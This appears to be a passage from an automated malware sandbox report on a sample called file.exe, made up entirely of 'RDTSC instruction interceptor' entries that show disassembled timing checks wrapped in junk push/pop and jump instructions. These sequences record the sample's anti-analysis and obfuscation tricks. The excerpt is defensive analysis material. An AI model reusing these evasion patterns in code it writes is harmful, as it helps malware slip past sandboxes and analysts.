                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE8B1 second address: 4EE8CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2AF86F4EA4h 0x00000009 jns 00007F2AF86F4E96h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE8CF second address: 4EE902 instructions: 0x00000000 rdtsc 0x00000002 js 00007F2AF93CAAB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jc 00007F2AF93CAAD3h 0x00000013 jl 00007F2AF93CAAB6h 0x00000019 jmp 00007F2AF93CAAC7h 0x0000001e push ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE902 second address: 4EE90D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE90D second address: 4EE911 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE911 second address: 4EE915 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58B0AE second address: 58B0CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F2AF93CAAC6h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58B0CA second address: 58B0E9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F2AF86F4E96h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2AF86F4E9Bh 0x00000013 jns 00007F2AF86F4E96h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58B0E9 second address: 58B0F9 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2AF93CAAB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58B0F9 second address: 58B0FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58B0FD second address: 58B11E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d jmp 00007F2AF93CAAC4h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58B11E second address: 58B134 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F2AF86F4E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jno 00007F2AF86F4E96h 0x00000011 push esi 0x00000012 pop esi 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58B134 second address: 58B13E instructions: 0x00000000 rdtsc 0x00000002 je 00007F2AF93CAABCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58B454 second address: 58B45A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58B45A second address: 58B463 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58B85D second address: 58B86E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F2AF86F4E9Ch 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58B86E second address: 58B87A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F2AF93CAAB6h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58BA29 second address: 58BA2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58BA2F second address: 58BA33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58BBBA second address: 58BBC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58BBC0 second address: 58BBC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58BBC6 second address: 58BBD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F2AF86F4E96h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007F2AF86F4E96h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58F94C second address: 58F950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58F950 second address: 58F972 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AF86F4EA5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58F972 second address: 58F985 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 jng 00007F2AF93CAAE3h 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58F985 second address: 58F9A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2AF86F4E9Bh 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jo 00007F2AF86F4E96h 0x00000015 jp 00007F2AF86F4E96h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58F1A3 second address: 58F1DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F2AF93CAAB6h 0x0000000a jmp 00007F2AF93CAAC2h 0x0000000f popad 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F2AF93CAAC8h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58F1DB second address: 58F1EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F2AF86F4E9Ah 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58F1EB second address: 58F202 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AF93CAAC3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 594463 second address: 594468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 593E73 second address: 593E77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 593E77 second address: 593E8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2AF86F4E9Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 593FEC second address: 594008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2AF93CAAC8h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 594008 second address: 59400E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59C59F second address: 59C5A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59C5A5 second address: 59C5AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59C5AB second address: 59C5B8 instructions: 0x00000000 rdtsc 0x00000002 je 00007F2AF93CAAB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59A741 second address: 59A755 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F2AF86F4E9Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F2AF86F4E96h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59A8AA second address: 59A8CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AF93CAAC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59ABA7 second address: 59ABAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59ABAD second address: 59ABB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59AE88 second address: 59AEA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2AF86F4EA4h 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59AEA5 second address: 59AEB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F2AF93CAAB6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d popad 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59AEB8 second address: 59AEBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59B70F second address: 59B719 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2AF93CAAB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BCC3 second address: 59BCCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BCCB second address: 59BCCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BCCF second address: 59BCD5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BFCD second address: 59BFD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BFD2 second address: 59BFD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BFD8 second address: 59C043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jnl 00007F2AF93CAAD3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push edi 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F2AF93CAABEh 0x00000018 pop edi 0x00000019 push eax 0x0000001a jmp 00007F2AF93CAAC7h 0x0000001f jmp 00007F2AF93CAABBh 0x00000024 pop eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jc 00007F2AF93CAAB6h 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59F70E second address: 59F719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59F719 second address: 59F74A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2AF93CAABAh 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F2AF93CAAC3h 0x00000014 popad 0x00000015 pushad 0x00000016 jp 00007F2AF93CAAB6h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59F74A second address: 59F750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59F8A2 second address: 59F8B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2AF93CAABBh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59F8B1 second address: 59F8CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AF86F4EA1h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59F8CA second address: 59F8CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59FBDC second address: 59FC0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AF86F4EA5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F2AF86F4EA1h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59FC0B second address: 59FC11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59FD87 second address: 59FD91 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F2AF86F4EADh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AC11D second address: 5AC121 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AC121 second address: 5AC127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AC127 second address: 5AC13A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 jc 00007F2AF93CAAB8h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AC3B9 second address: 5AC3ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F2AF86F4EA3h 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jnc 00007F2AF86F4E96h 0x00000015 jmp 00007F2AF86F4EA0h 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AC3ED second address: 5AC3FD instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2AF93CAAC2h 0x00000008 jnp 00007F2AF93CAAB6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AC568 second address: 5AC5F2 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2AF86F4E96h 0x00000008 jmp 00007F2AF86F4E9Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F2AF86F4EA8h 0x00000014 jmp 00007F2AF86F4EA9h 0x00000019 jmp 00007F2AF86F4EA3h 0x0000001e popad 0x0000001f pushad 0x00000020 push eax 0x00000021 jmp 00007F2AF86F4E9Eh 0x00000026 pushad 0x00000027 popad 0x00000028 pop eax 0x00000029 jbe 00007F2AF86F4EA7h 0x0000002f jmp 00007F2AF86F4EA1h 0x00000034 push eax 0x00000035 push edx 0x00000036 push ecx 0x00000037 pop ecx 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AC743 second address: 5AC762 instructions: 0x00000000 rdtsc 0x00000002 je 00007F2AF93CAABEh 0x00000008 push ebx 0x00000009 jns 00007F2AF93CAAB6h 0x0000000f pop ebx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AC762 second address: 5AC76C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F2AF86F4E96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AC76C second address: 5AC79C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F2AF93CAAB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F2AF93CAAC4h 0x00000011 pushad 0x00000012 push edi 0x00000013 pop edi 0x00000014 je 00007F2AF93CAAB6h 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AC92F second address: 5AC933 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AC933 second address: 5AC937 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AC937 second address: 5AC93D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AC93D second address: 5AC943 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B429A second address: 5B42A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B42A0 second address: 5B42A5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B3F83 second address: 5B3F8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F2AF86F4E96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B3F8D second address: 5B3FA5 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2AF93CAAB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d je 00007F2AF93CAAB8h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B3FA5 second address: 5B3FAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B6831 second address: 5B684E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F2AF93CAAB6h 0x0000000a popad 0x0000000b js 00007F2AF93CAAC2h 0x00000011 jmp 00007F2AF93CAABAh 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B684E second address: 5B6891 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2AF86F4EA8h 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 je 00007F2AF86F4ED2h 0x00000016 jmp 00007F2AF86F4EA3h 0x0000001b push eax 0x0000001c push edx 0x0000001d jbe 00007F2AF86F4E96h 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C3285 second address: 5C3289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C3289 second address: 5C32B0 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2AF86F4E96h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F2AF86F4EA7h 0x00000012 pushad 0x00000013 popad 0x00000014 pop eax 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C32B0 second address: 5C32D1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 je 00007F2AF93CAAB6h 0x00000009 jmp 00007F2AF93CAABAh 0x0000000e pop ebx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jnc 00007F2AF93CAAB6h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C605A second address: 5C6060 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C6060 second address: 5C6064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C5C0F second address: 5C5C1B instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2AF86F4E9Eh 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CDB25 second address: 5CDB4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2AF93CAAC6h 0x00000009 popad 0x0000000a jl 00007F2AF93CAAB8h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DEBA2 second address: 5DEBD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F2AF86F4EA7h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2AF86F4EA4h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DEBD4 second address: 5DEBD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DEBD8 second address: 5DEBDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DD418 second address: 5DD41C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DD9ED second address: 5DDA0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F2AF86F4EA5h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DDA0B second address: 5DDA11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DDCAC second address: 5DDCB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DDCB0 second address: 5DDCE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AF93CAABEh 0x00000007 jp 00007F2AF93CAAB6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F2AF93CAAC3h 0x00000016 push ecx 0x00000017 push eax 0x00000018 pop eax 0x00000019 pushad 0x0000001a popad 0x0000001b pop ecx 0x0000001c rdtsc
